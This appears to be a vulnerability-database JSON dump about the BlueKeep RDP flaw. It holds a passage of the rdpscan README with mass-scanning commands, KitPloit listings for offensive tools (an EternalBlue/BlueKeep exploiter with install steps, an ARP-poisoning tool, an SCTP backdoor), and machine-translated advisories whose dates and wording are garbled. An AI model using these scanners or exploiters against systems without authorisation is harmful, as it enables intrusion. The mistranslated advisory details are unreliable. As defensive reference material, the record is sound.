has some other service that happens to use this same port, and produces a response that's clearly not RDP. Common examples are HTTP and SSH. Note however that instead of an identifiable protocol, a server may respond with a RST or FIN packet. These are identified as _ UNKNOWN _ instead of _ SAFE _ / \n \n** VULNERABLE ** \nThis means we've confirmed the system is vulnerable to the bug. \n\n\n * _ VULNERABLE - got appid _ There is only one response when the system is vulnerable, this one. \n \n** UNKNOWN ** \nThere are a zillion variations for unknown \n\n\n * _ UNKNOWN - no connection - timeout _ This is by far the most common response, and happens when the target IP address makes no response whatsoever. In fact, it's so common that when scanning large ranges of addresses, it's usually ommited. You have to add the _ -v _ (verbose) flag in order to enable it. \n * _ UNKNOWN - no connection - refused (RST) _ This is by far the second most common response, and happens when the target exists and responds to network traffic, but isn't running RDP, so refuses the connection with a TCP RST packet. \n * _ UNKNOWN - RDP protocol error - receive timeout _ This is the third most common response, and happens when we've successfully established an RDP connection, but then the server stops responding to us. This is due to network errors and when the target system is overloaded for some reason. It could also be network errors on this end, such as when you are behind a NAT and overloading it with too many connections. \n * _ UNKNOWN - no connection - connection closed _ This means we've established a connection (TCP SYN-ACK), but then the connection is immediately closed (with a RST or FIN). There are many reasons this happen, which we cannot distinguish: \n * It's running RDP, but for some reason closes the connection, possibly because it's out-of-resources. \n * It's not RDP, and doesn't like the RDP request we send it, so instad of sending us a nice error message (which would trigger _ SAFE - not RDP _ ), it abruptly closes the connection. \n * Some intervening device, like an IPS, firewall, or NAT closed the connection because it identified this as hostile, or ran out of resources. \n * Some other reason I haven't identified, there's a lot of weird stuff happening when I scan the Internet. \n * _ UNKNOWN - no connection - host unreachable (ICMP error) _ The remote network reports the host cannot be reached or is not running. Try again later if you think that host should be alive. \n * _ UNKNOWN - no connection - network unreachable (ICMP error) _ There is a (transient) network error on the far end, try again later if you believe that network should be running. \n * _ UNKNOWN - RDP protocol error _ This means some corruption happened in the RDP protocol, either because the remote side implents it wrong (not a Windows system), because it's handling a transient network error badly, or something else. \n * _ UNKNOWN - SSL protocol error _ Since Windows Vista, RDP uses the STARTTLS protocol to run over SSL. This layer has it's own problems like above, which includes handling underlying network errors badly, or trying to communicate with systems that have some sort of incompatibility. If you get a very long error message here (like SSL3_GET_RECORD:wrong version), it's because the other side has a bug in SSL, or your own SSL library that you are using has a bug. \n \n** Using with masscan ** \nThis ` rdpscan ` tool is fairly slow, only scanning a few hundred targets per second. You can instead use [ ` masscan ` ](<https://github.com/robertdavidgraham/masscan> \"A quick scanner for the CVE-2019-0708 BlueKeep vulnerability. \\(11\\)\" ) to speed things up. The ` masscan ` tool is roughly 1000 times faster, but only gives limited information on the target. \nThe steps are: \n\n\n * First scan the address ranges with masscan to quickly find hosts that respond on port 3389 (or whatever port you use). \n * Second feed the output of ` masscan ` into ` rdpscan ` , so it only has to scan targets we know are active. \nThe simple way to run this is just to combine them on the command-line: \n\n \n \n masscan 10.0.0.0/8 -p3389 | rdpscan --file -\n\nThe way I do it is in two steps: \n\n \n \n masscan 10.0.0.0/8 -p3389 > ips.txt\n rdpscan --file ips.txt --workers 10000 >results.txt\n\n \n** Building ** \nThe difficult part is getting the _ OpenSSL _ libraries installed, and not conflicting with other versions on the system. Some examples for versions of Linux I've tested on are the following, but they keep changing package names from one distribution to the next. Also, there are many options for an OpenSSL-compatible API, such as BoringSSL and LibreSSL. \n\n \n \n $ sudo apt install libssl-dev\n $ sudo yum install openssl-devel\n\nOnce you've solved that problem, you just compile all the ` .c ` files together like this: \n\n \n \n $ gcc *.c -lssl -lcrypto -o rdpscan\n\nI've put a Makefile in the directory that does this, so you can likely do just: \n\n \n \n $ make\n\nThe code is written in C, so needs a C [ compiler ](<https://www.kitploit.com/search/label/Compiler> \"compiler\" ) installed, such as doing the following: \n\n \n \n $ sudo apt install build-essential\n\n \n** Common build errors ** \nThis section describes the more obvious build errors. \n\n \n \n ssl.h:24:25: fatal error: openssl/rc4.h: No such file or directory\n\nThis means you either don't have the OpensSSL headers installed, or they aren't in a path somewhere. Remember that even if you have OpenSSL binaries installed, this doesn't mean you've got the development stuff installed. You need both the headers and libraries installed. \nTo install these things on Debian, do: \n\n \n \n $ sudo apt install libssl-dev\n\nTo fix the path issue, add a compilation flag ` -I/usr/local/include ` , or something similar. \nAn example linker problem is the following: \n\n \n \n Undefined symbols for architecture x86_64:\n \"_OPENSSL_init_ssl\", referenced from:\n _tcp_tls_connect in tcp-fac73c.o\n \"_RSA_get0_key\", referenced from:\n _rdssl_rkey_get_exp_mod in ssl-d5fdf5.o\n \"_SSL_CTX_set_options\", referenced from:\n _tcp_tls_connect in tcp-fac73c.o\n \"_X509_get_X509_PUBKEY\", referenced from:\n _rdssl_cert_to_rkey in ssl-d5fdf5.o\n\nI get this on macOS because there's multiple versions of OpenSSL. I fix this by hard-coding the paths: \n\n \n \n $ gcc *.c -lssl -lcrypto -I/usr/local/include -L/usr/local/lib -o rdpscan\n\nAccording to comments by others, the following command-line might work on macOS if you've used Homebrew to install things. I still get the linking errors above, though, because I've installed other OpenSSL components that are conflicting. \n\n \n \n gcc $(brew --prefix)/opt/openssl/lib/libssl.a $(brew --prefix)/opt/openssl/lib/libcrypto.a -o rdpscan *.c\n\n \n** Running ** \nThe section above gives quickstart tips for running the program. This section gives more in-depth help. \nTo scan a single target, just pass the address of the target: \n\n \n \n ./rdpscan 192.168.10.101\n\nYou can pass in IPv6 addresses and DNS names. You can pass in multiple targets. An example of this would be: \n\n \n \n ./rdpscan 192.168.10.101 exchange.example.com 2001:0db8:85a3::1\n\nYou can also scan ranges of addresses, using either begin-end IPv4 addresses, or IPv4 CIDR spec. IPv6 ranges aren't supported because they are so big. \n\n \n \n ./rdpscan 10.0.0.1-10.0.0.25 192.168.0.0/16\n\nBy default, it scans only 100 targets at a time. You can increase this number with the ` --workers ` parameter. However, no matter how high you set this parameter, in practice you'll get a max of around 500 to 1500 workers running at once, depending upon your system. \n\n \n \n ./rdpscan --workers 1000 10.0.0.0/24\n\nInstead of specifying targets on the command-line, you can load them from a file instead, using the well-named ` --file ` parameter: \n\n \n \n ./rdpscan --file ips.txt\n\nThe format of the file is one address, name, or range per line. It can also consume the text generated by ` masscan ` . Extra whitespace is trimmed, blank lines ignored, any any comment lines are ignored. A _ comment _ is a line starting with the ` # ` character, or ` // ` characters. \nThe output is sent to ` stdout ` giving the status of VULNERABLE, SAFE, or UNKNOWN. There could be additional reasons for each. These reasons are described above. \n\n \n \n 211.101.37.250 - SAFE - CredSSP/NLA required\n 185.11.124.79 - SAFE - not RDP - SSH response seen\n 125.121.137.42 - UNKNOWN - no connection - refused (RST)\n 40.117.191.215 - SAFE - CredSSP/NLA required\n 121.204.186.182 - SAFE - CredSSP/NLA required\n 99.8.11.148 - SAFE - CredSSP/NLA required\n 121.204.186.114 - SAFE - CredSSP/NLA required\n 49.50.145.236 - SAFE - CredSSP/NLA required\n 106.12.74.155 - VULNERABLE - got appid\n 222.84.253.26 - SAFE - CredSSP/NLA required\n 144.35.133.109 - UNKNOWN - RDP protocol error - receive timeout\n 199.212.226.196 - UNKNOWN - RDP protocol error - receive timeout\n 183.134.58.152 - UNKNOWN - no connection - refused (RST)\n 83.162.246.149 - VULNERABLE - got appid\n\nYou can process this with additional unix commands like ` grep ` and ` cut ` . To get a list of just vulnerable machines: \n\n \n \n ./rdpscan 10.0.0.0/8 | grep 'VULN' | cut -f1 -d'-'\n\nThe parameter ` -dddd ` means _ diagnostic _ information, where the more ` d ` s you add, the more details are printed. This is sent to ` stderr ` instead of ` stdout ` so that you can separate the streams. Using ` bash ` this is done like this: \n\n \n \n ./rdpscan --file myips.txt -ddd 2> diag.txt 1> results.txt\n\n \n** Diagnostic info ** \nAdding the ` -d ` parameter dumps diagnostic info on the connections to ` stderr ` . \n\n \n \n ./rdpscan 62.15.34.157 -d\n \n [+] [62.15.34.157]:3389 - connecting...\n [+] [62.15.34.157]:3389 - connected from [10.1.10.133]:49211\n [+] [62.15.34.157]:3389 - SSL connection\n [+] [62.15.34.157]:3389 - version = v4.8\n [+] [62.15.34.157]:3389 - Sending MS_T120 check packet\n [-] [62.15.34.157]:3389 - Max sends reached, waiting...\n 62.15.34.157 - SAFE - Target appears patched\n\nOn macOS/Linux, you can redirect ` stdout ` and ` stderr ` separately to different files in the usual manner: \n\n \n \n ./rdpscan --file ips.txt 2> diag.txt 1> results.txt\n\n \n** SOCKS5 and Tor lulz ** \nSo it includes SOCKS5 support: \n\n \n \n ./rdpscan --file ips.txt --socks5 localhost --socks5port 9050\n\nIt makes connection problems worse so you get a lot more \"UNKNOWN\" results. \n \n** Statically link OpenSSL ** \nFor releasing the Windows and macOS binaries attached as _ releases _ to this project I statically link OpenSSL, so that it doesn't need to be included separately, and the programs _ just work _ . This section describes some notes on how to do this, especially since the description on OpenSSL's own page seems to be out of date. \nBoth these steps start with downloading the OpenSSL source and putting it next to the ` rdpscan ` directory: \n\n \n \n git clone https://github.com/openssl/openssl\n\n \n** Windows ** \nFor Windows, you need to first install some version of Perl. I use the one from [ ActiveState ](<https://www.activestate.com/ActivePerl> \"ActiveState\" ) . \nNext, you'll need a special \"assembler\". I use the recommended one called [ NASM ](<http://nasm.sourceforge.net/> \"NASM\" ) ) \nNext, you'll need a compiler. I use VisualStudio 2010. You can download the latest \"Visual Studio Community Edition\" (which is 2019) instead from Microsoft. \nNow you need to build the makefile. This is done by going into the OpenSSL directory and running the ` Configure ` Perl program: \n\n \n \n perl Configure VC-WIN32\n\nI chose 32-bit for Windows because there's a lot of old Windows out there, and I want to make the program as compaitble as possible with old versions. \nI want a completely static build, including the C runtime. To do that, I opened the resulting makefile in an editor, and changed the C compilation flag from ` /MD ` (meaning use DLLs) to ` /MT ` . While I was there, I added the following to the CPPFLAGS ` -D_WIN32_WINNT=0x501 ` , which restrict OpenSSL to features that work back on Windows XP and Server 2003. Otherwise, you get errors that ` bcrypt.dll ` was not found if your run on those older systems. \nNow you'll need to make sure everything is in your path. I copied ` nasm.exe ` to the a directory in the PATH. For Visual Studio 2010, I ran the program ` vcvars32.bat ` to setup the path variables for the compiler. \nAt this point on the command-line, I typed: \n\n \n \n nmake\n\nThis makes the libraries. The static ones are ` libssl_static.lib ` and ` libcrypto_static.lib ` , which I use to link to in ` rdpscan ` . \n \n** macOS ** \nFirst of all, you need to install a compiler. I use the Developer Tools from Apple, installing XCode and the compiler. I think you can use Homebrew to install ` gcc ` instead. \nThen go int othe source directory for OpenSSL and create a makefile: \n\n \n \n perl Configure darwin64-x86_64-cc\n\nNow simply make it: \n\n \n \n make depend\n make\n\nAt this point, it's created both dynamic ( ` .dylib ` ) and static ( ` .lib ` ) libraries. I deleted the dynamic libraries so that it'll catch the static ones by default. \nNow in ` rdpscan ` , just build the macOS makefile: \n\n \n \n make -f Makefile.macos\n\nThis will compile all the ` rdpscan ` source files, then link to the OpenSSL libraries in the directory ` ../openssl ` that you just built. \nThis should produce a 3-megabyte exexeutable. If you instead only got a 200-kilobyte executable, then you made a mistake and linked to the dynamic libraries instead. \n \n \n\n\n** [ Download Rdpscan ](<https://github.com/robertdavidgraham/rdpscan> \"Download Rdpscan\" ) **\n", "edition": 6, "modified": "2019-06-19T12:32:00", "published": "2019-06-19T12:32:00", "id": "KITPLOIT:998955151150716619", "href": "http://www.kitploit.com/2019/06/rdpscan-quick-scanner-for-cve-2019-0708.html", "title": "Rdpscan - A Quick Scanner For The CVE-2019-0708 \"BlueKeep\" Vulnerability", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-01T09:25:03", "bulletinFamily": "tools", "cvelist": ["CVE-2018-13379", "CVE-2019-0708"], "description": "[  ](<https://1.bp.blogspot.com/-qZPJhRorVMI/XZq0ctzzFKI/AAAAAAAAQik/H4F3k-V5m3s3fUtxBbpoR_TKVpi5Vp2gwCNcBGAsYHQ/s1600/ispy_1.png>)\n\n \nispy : Eternalblue(ms17-010)/Bluekeep(CVE-2019-0708) [ Scanner ](<https://www.kitploit.com/search/label/Scanner> \"Scanner\" ) and exploiter ( [ Metasploit ](<https://www.kitploit.com/search/label/Metasploit> \"Metasploit\" ) [ automation ](<https://www.kitploit.com/search/label/Automation> \"automation\" ) ) \n \n** How to install : ** \n\n \n \n git clone https://github.com/Cyb0r9/ispy.git\n cd ispy\n chmod +x setup.sh\n ./setup.sh\n\n \n** Screenshots : ** \n \n\n\n[  ](<https://1.bp.blogspot.com/-HQs7rcHIQxM/XZq0mM6aJQI/AAAAAAAAQio/6S3e2ulFtdgBw8-HT28BMkiqIxzT3T70ACNcBGAsYHQ/s1600/ispy_2.png>)\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-tKdxGMv8vjM/XZq0mfcIx3I/AAAAAAAAQis/it_vb80HgNQu-hiz3763YkbD2FZGBj06QCNcBGAsYHQ/s1600/ispy_3.png>)\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-rCLDAx1_XIk/XZq0mcy3KNI/AAAAAAAAQiw/UUWZ7-uF9dMsUcqLEFBmFEGWTs2RMJyjQCNcBGAsYHQ/s1600/ispy_4.png>)\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-sQ1Rj5Qcj9k/XZq0nHBDLzI/AAAAAAAAQi0/UlQ0mARnB7AVE6pNRbGV3IrGNg3eUw2WQCNcBGAsYHQ/s1600/ispy_5.png>)\n\n \n \n** Tested On : ** \n\n\n * Parrot OS \n * Kali linux \n \n** Tutorial ( How to use ispy ) ** \n \n\n\n \n** info ** \n\n\n * GitHub profile : [ https://github.com/Cyb0r9 ](<https://github.com/Cyb0r9> \"https://github.com/Cyb0r9\" )\n * YouTbue channel: [ https://youtube.com/c/Cyborg_TN ](<https://youtube.com/c/Cyborg_TN> \"https://youtube.com/c/Cyborg_TN\" )\n * Ask Fm (ask me): [ https://ask.fm/Cyborg_TN ](<https://ask.fm/Cyborg_TN> \"https://ask.fm/Cyborg_TN\" )\n * E-mail address : [email protected] \n \n** Disclaimer : ** \n \n** usage of ispy for attacking targets without prior mutual consent is illegal. ** \n** ispy is for security [ testing ](<https://www.kitploit.com/search/label/Testing> \"testing\" ) purposes only ** \n \n \n\n\n** [ Download Ispy ](<https://github.com/Cyb0r9/ispy> \"Download Ispy\" ) **\n", "edition": 175, "modified": "2019-10-09T21:00:10", "published": "2019-10-09T21:00:10", "id": "KITPLOIT:4482238198881011483", "href": "http://www.kitploit.com/2019/10/ispy-eternalblue-ms17-010-bluekeep-cve.html", "title": "Ispy - Eternalblue (MS17-010) / Bluekeep (CVE-2019-0708) Scanner And Exploit", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-11T04:39:09", "bulletinFamily": "tools", "cvelist": ["CVE-2019-0708"], "description": "[  ](<https://2.bp.blogspot.com/-YbcCrZRlDzs/UmwvAGGQUdI/AAAAAAAABJQ/sFLh_4hylSI/s1600/lynis-screenshot.png>)\n\n \n\n\nLynis is an auditing tool for Unix/Linux (specialists). It scans the system and available software and performs many individual security checks. It determines the hardening state of the machine and detects security issues. Beside security related information it will also scan for general system information, installed packages and possible configuration errors. \n\n \n\n\nThis software aims in assisting automated auditing, hardening, software patch management, vulnerability and malware scanning of Unix/Linux based systems. It can be run without prior installation, so inclusion on read only storage is possible (USB stick, cd/dvd). \n\n \n\n\nLynis assists auditors in performing Basel II, GLBA, HIPAA, PCI DSS and SOx (Sarbanes-Oxley) compliance audits. \n\n \n\n\n** Intended audience: ** Security specialists, penetration testers, system auditors, system/network managers. ** Examples of audit tests: ** \\- Available authentication methods- Expired SSL certificates- Outdated software- User accounts without password- Incorrect file permissions- Configuration errors- Firewall auditing \n \n\n\n** [ Download Lynis ](<http://www.rootkit.nl/projects/lynis.html>) **\n", "edition": 16, "modified": "2013-10-26T21:08:36", "published": "2013-10-26T21:08:36", "id": "KITPLOIT:3080370456145673111", "href": "http://www.kitploit.com/2013/10/lynis-security-and-system-auditing-tool.html", "title": "[Lynis] Security and system auditing tool to harden Linux systems", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-21T09:54:47", "bulletinFamily": "tools", "cvelist": ["CVE-2019-0708"], "description": "ARPwner is a tool to do ARP poisoning and DNS poisoning attacks, with a simple GUI and a plugin system to do filtering of the information gathered, also has a implementation of sslstrip and is coded 100% in python and on Github, so you can modify according to your needs. \n\n \n\n\n[  ](<https://4.bp.blogspot.com/-Sgm2P60vxGY/US4wvZi0VaI/AAAAAAAAAQU/_EFK2MhqGXU/s1600/ARPwner.jpg>)\n\n \n \n\n\nThis tool was released by Nicolas Trippar at BlackHat USA 2012. \n\n \n\n\nFor the tool to work you need pypcap, so assuming are using a Debian derivative OS (like all sane people do) \u2013 you\u2019ll need to do this first: \n\n \n\n\n** _ apt-get install python-pypcap _ **\n\n \n\n\n \n\n\n** You can download ARPwner here: [ ARPwner.zip ](<https://github.com/ntrippar/ARPwner/archive/master.zip>) **\n\nOr read more [ here ](<https://github.com/ntrippar/ARPwner>) . \n\n \n\n", "edition": 10, "modified": "2013-02-27T16:15:33", "published": "2013-02-27T16:15:33", "id": "KITPLOIT:8309365460568193500", "href": "http://www.kitploit.com/2013/02/arpwner-arp-and-dns-poisoning-attack.html", "title": "[ARPwner] ARP and DNS Poisoning Attack Tool", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-21T09:55:08", "bulletinFamily": "tools", "cvelist": ["CVE-2019-0708"], "description": "Web-Sorrow is a perl based tool for misconfiguration, version detection, enumeration, and server information scanning. It's entirely focused on Enumeration and collecting Info on the target server. Web-Sorrow is a \"safe to run\" program, meaning it is not designed to be an exploit or perform any harmful attacks. \n\n \n \n \n \n[ ** Download Web-Sorrow ** ](<https://code.google.com/p/web-sorrow/downloads/list>)\n", "edition": 8, "modified": "2013-02-25T23:39:04", "published": "2013-02-25T23:39:04", "id": "KITPLOIT:1049860926455958760", "href": "http://www.kitploit.com/2013/02/web-sorrow-tool-for-misconfiguration.html", "title": "[Web-Sorrow] Tool for Misconfiguration, Version Detection, Enumeration, and Server Information Scanning", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-10T14:33:57", "bulletinFamily": "tools", "cvelist": ["CVE-2019-0708"], "description": "FoxOne is a free OSINT tool, described by the author (th3j35t3r) as a Non-Invasive and Non-Detectable Server Reconnaissance Scanner. \n\n \n\n\nBypassing API limitations and currently detecting 6500+ vulnerable server paths/files \u2013 without ever touching the target server. Very good for getting hold of intel on a given domain (example.com). The intel gained serves both as actionable in the sense that it could be directly used to help root a box, while at the same time giving a good overview of stuff thats present on the box and where it is within the directory structure. \n\n \n\n\nFoxOne Scanner creates a report and dumps it on your Desktop. \n\n \n\n\n** Features **\n\n * Anti False-Positive Measures \n * Bot Stealth Measures \n * Modular Framework for easy importing of new modules. \n\n \n\n\n** Requirements **\n\n * MySQL Server \n * PHP5 \n * PHP-GD Library \n * PHP-MySQL \n * Festival (text to speech) \n\n \n\n\n** Installation **\n\n \n\n\n1). Create a MySQL database anywhere (localhost is fine). \n\n2). Import \u2018foxone.sql\u2019 into the database you just created. \n\n3). Edit \u2018foxone\u2019 adding the details of the database you just setup. \n\n \n\n\n \n\n\nYou can download FoxOne Scanner here: \n\n[ ** Download FoxOne ** ](<http://www2.zippyshare.com/v/1223894/file.html>)\n", "edition": 12, "modified": "2013-11-04T03:21:30", "published": "2013-11-04T03:21:30", "id": "KITPLOIT:6972580572774284552", "href": "http://www.kitploit.com/2013/11/foxone-free-osint-tool-server.html", "title": "[FoxOne] Free OSINT Tool - Server Reconnaissance Scanner", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-10T14:35:16", "bulletinFamily": "tools", "cvelist": ["CVE-2019-0708"], "description": " \n\n\n[  ](<https://1.bp.blogspot.com/-nBFEtVryKZQ/UmXHnE9md6I/AAAAAAAABHc/OdhQsG_ruZ8/s1600/sctp_camion.png>)\n\nYou may have seen, a while ago, my post on SCTP reverse shells. \n\n \n\n\nI realized quite quickly that I should definately do some more research in this direction, and hence ported one of my favourite Unix backdoors (which uses a TCP connection) to use a SCTP connection instead. This backdoor allows for a remote PTY, file upload, and file download. It also is encrypted connection. \n\n \n\n\nThe backdoor in question is \u2018TinySHell\u2019 by the inestimable Christophe Devine (who left quite a legacy of code, which I may start to maintain as he appears to have vanished. Chris, if you are out there, get in touch or something! Love your work!). I spent a short while examining the code, then quickly patched it up to replace all the TCP stuff with SCTP stuff. I imagine I could easily alter it to do UDP, and might try that later. \n\n \n\n\nAnyways, without further ado, here is the code. Again, all credit to Chris, all I did was modify it! \n\n \n\n\n \n\n\n[ ** Download TinySHell ** ](<https://github.com/infodox/tsh-sctp>)\n", "edition": 14, "modified": "2013-10-22T00:34:40", "published": "2013-10-22T00:34:40", "id": "KITPLOIT:102871766956097088", "href": "http://www.kitploit.com/2013/10/tinyshell-ported-to-sctp.html", "title": "[TinySHell] Ported to SCTP", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-21T09:55:30", "bulletinFamily": "tools", "cvelist": ["CVE-2019-0708"], "description": "Hwk is an easy-to-use wireless authentication and deauthentication tool. Furthermore, it also supports probe response fuzzing, beacon injection flooding, antenna alignment and various injection testing modes. Information gathering is selected by default and shows the incoming traffic indicating the packet types. \n\n \n \n\n\n \n\n\n[ ** http://www.nullsecurity.net/tools/wireless.html ** ](<http://www.nullsecurity.net/tools/wireless.html>)\n", "edition": 10, "modified": "2013-02-26T01:14:23", "published": "2013-02-26T01:14:23", "id": "KITPLOIT:4205221140433081492", "href": "http://www.kitploit.com/2013/02/hwk-wireless-exploitation-tool.html", "title": "[Hwk] Wireless Exploitation Tool", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-10T22:31:48", "bulletinFamily": "tools", "cvelist": ["CVE-2019-0708"], "description": "[  ](<https://2.bp.blogspot.com/-WbxXCxBl9Vg/UmXI7ixd3BI/AAAAAAAABHk/YdRCjR0gJ_w/s1600/scr_startuppartol.png>)\n\n \n\n\nOften may happen your PC to run a little slower than usual. Don't worry, it is nothing serious. You\u2019ve probably installed some software that delayed the boot time. \n\n** \n**\n\n** SterJo Startup Patrol ** allows you to view those files and disable them. This way you can optimize the Windows startup time but be careful not to disable some crucial programs you are using. By blocking those unneeded files the system will definitely run faster and smoother. \n\n \n\n\nThe software constantly tracks the new or modified startup registry and notifies if some changes appears. \n\n \n\n\nIf any application tries to put a startup registry on your system then the software will display the application with the following information: _ Section, Product Name, Product Description, Company, Version and Process Path _ . \n\n \n\n\nUsing the displayed information the user could disable or delete the unwanted program and prevent it from automatically running. \n\n \n\n\n** [ Download SterJo Startup Patrol v.1.3 ](<http://www.sterjosoft.com/startup-patrol.html>) **\n", "edition": 18, "modified": "2013-10-22T00:39:30", "published": "2013-10-22T00:39:30", "id": "KITPLOIT:727243444931520192", "href": "http://www.kitploit.com/2013/10/sterjo-startup-patrol-v13-disable.html", "title": "[SterJo Startup Patrol v.1.3] Disable software that delayed the boot time", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-10T14:35:49", "bulletinFamily": "tools", "cvelist": ["CVE-2019-0708"], "description": "[  ](<https://4.bp.blogspot.com/-Qexfn7_qb7M/UmXGp863V1I/AAAAAAAABHU/0ZoCAkIqiLg/s1600/ipv6disable_mainscreen_big.jpg>)\n\n** \n** ** IPv6 Disable ** is the free command-line tool to quickly Enable or Disable IPv6 (Internet Protocol version 6) on your Windows system. \n \n \nIt automatically checks for the ** current status of IPv6 ** and then enable/disable it accordingly. \nIt is simple &amp; easy to use tool. Also being a ** command-line ** based tool makes it perfect for automation and to use on ** remote systems ** . \n \n\n\n** [ Download IPv6 Disable v1.5 ](<http://securityxploded.com/download.php#ipv6disable>) **\n", "edition": 16, "modified": "2013-10-22T00:29:28", "published": "2013-10-22T00:29:28", "id": "KITPLOIT:43221571859278589", "href": "http://www.kitploit.com/2013/10/ipv6-disable-tool-command-line-software.html", "title": "[IPv6 Disable Tool] Command-line Software to Enable or Disable IPv6 on Windows", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2019-05-15T15:21:00", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "2019 5 on 14 September, Microsoft is the emergency release for the Remote Desktop service Remote Desktop Service, RDP, previously known as Terminal Services remote code execution vulnerability CVE-2019-0708 fix, the vulnerability affects some older versions of Windows system such as Windows XP, Windows Server 2003, Windows 7, Windows Server 2008, etc. \nTheoretically, the Remote Desktop Services does not in itself vulnerable to attack, but once attacked, the consequences however could be disastrous. If you still don't know the vulnerability of power, please think about 2017 5 on the outbreak of the WannaCry, also called Wanna Decryptor to. \nCVE-2019-0708 vulnerability simply by pre-authentication, pre-authentication and no user interaction will be able to achieve the attack, which means that it and WannaCry the same, all belong to a\u201cworm\u201dattack. This vulnerability can be through the network worms of the way be utilized, the use of this vulnerability with any malicious software are possible from the infected computer to spread to other vulnerable computers, in a manner and 2017 WannaCry malware spread in a similar way. \nAlthough the Microsoft Security Response Center MSRC temporarily did not find favor with this vulnerability the malicious samples, but still want to be fully prepared. A recent study found that a malicious attacker is likely for this vulnerability to write an exploit program, and embedding it into their own malware. \nThe scope of the impact \n\u00b7 Windows 7; \n\u00b7 Windows Server 2008 R2; \n\u00b7 Windows Server 2008; \n\u00b7 Windows 2003\uff1b \n\u00b7 Windows XP; the \nPlease note: Windows 8 and Windows 10 and later version users are not affected by this vulnerability. \nRepair way \nCan be in Microsoft Security Update Guide found in the support Windows version download, using a supported version of Windows and enable the automatic update client will automatically be protected. \nUnsupported systems including Windows 2003 and Windows XP, if you use an unsupported version, the solution to this vulnerability is the best way to upgrade to the latest version of Windows. Even so, Microsoft is still in the KB4500705 for these unsupported versions of Windows to provide a fix. \nIn the enable network level authentication NLA of affected system may be part of the mitigation could exploit this vulnerability\u201csuspicious\u201dmalware or advanced malicious software threat, because the NLA in the trigger the vulnerability before the need for authentication. However, if the attacker has can be used to successfully authenticate with valid credentials, the affected system is still vulnerable to remote execution code execution RCE of the attack. \nFor these reasons, Microsoft strongly recommends that all affected systems, whether NLA is enabled, it should be updated soon. \nPossible attack power \nSuccessful exploitation of this vulnerability an attacker can be on the target system, execute arbitrary code, then an attacker can install a malicious program, and then view, change, or delete the target data on the device, and even create a full user permissions to the new account. \nTo exploit this vulnerability method \nTo exploit this vulnerability, an attacker would need to via RDP to the target system the Remote Desktop service to send a send a specially design request. \nReference and source: \nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708 \nhttps://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/?from=groupmessage&amp;isappinstalled=0 \n\n", "edition": 1, "modified": "2019-05-15T00:00:00", "published": "2019-05-15T00:00:00", "id": "MYHACK58:62201994153", "href": "http://www.myhack58.com/Article/html/3/62/2019/94153.htm", "title": "Microsoft emergency release CVE-2019-0708 vulnerability fixes-bug warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-09-07T10:43:36", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "9 \u6708 7 Morning, open your eyes, the continuous rain of Shanghai has finally cleared up, the circle of friends was the\u201cstorm\u201d--the one known as wannacry level of vulnerability BlueKeep\uff08CVE-2019-0708\uff09exploit released. \n! [](/Article/UploadPic/2019-9/20199714522870. png) \nMetasploit on the blog and Twitter, in succession to publish news that Metasploit formal integration for CVE-2019-0708, also known as the BlueKeep the Exploit module, although at present the initial version applies only to the 64-bit version of Windows 7 and Windows 2008 R2, but also the release of a threat signal, no potential attacker has already begun to pay attention to this information, along with the subsequent module updates, BlueKeep the vulnerability of the power is also gradually revealed. \n! [](/Article/UploadPic/2019-9/20199714522398. png) \nCurrently have noticed a lot of security personnel or the laboratory has conducted a vulnerability reproduced, further confirmed the EXP availability. Note that the EXP is easy to cause the system to blue screen caused by a system interruption in service. Recommendations of the red team, etc. before the test, the evaluation system degree of importance, caution. \nOn BlueKeep\uff08CVE-2019-0708\uff09 \nGMT 5 December 15, Microsoft released for Remote Desktop Services remote code execution vulnerability CVE-2019-0708 fixes, the vulnerability is triggered without user interaction. This also means that an attacker can use the vulnerability to make similar to 2017 swept the world of WannaCry class of worm virus, large-scale spread and destruction. \nRemote Desktop Services formerly known as Terminal Services in remote code execution vulnerability exists when an unauthenticated attackers use RDP to connect to the target system and send a specially crafted request. Successful exploitation of this vulnerability an attacker can be on the target system execute arbitrary code. The attacker could then install programs; view, change, or delete data; or create full user permissions to the new account. To exploit this vulnerability, an attacker would only need to via RDP to the target system the Remote Desktop service send a malicious request. \nThis vulnerability timeline: \nOf 1, 2019, 5 November 14 \nMicrosoft released Remote Desktop Services remote code execution vulnerability CVE-2019-0708 safety notices and the corresponding patch, and especially for this vulnerability released specifically described, suggesting this is a possible cause worms the spread of serious vulnerability \nThe 2, 2019 5 May 15, \nBucket like the smart security platform release vulnerability early warning information and disposal program, then the bucket like a smart security platform for the ARS/PRS on line vulnerability detection tool \n3, the 2019 5 May 23, \nInternet open channels with non-destructive vulnerability scanning function of the PoC program \nA 4, 2019 5 May 25, 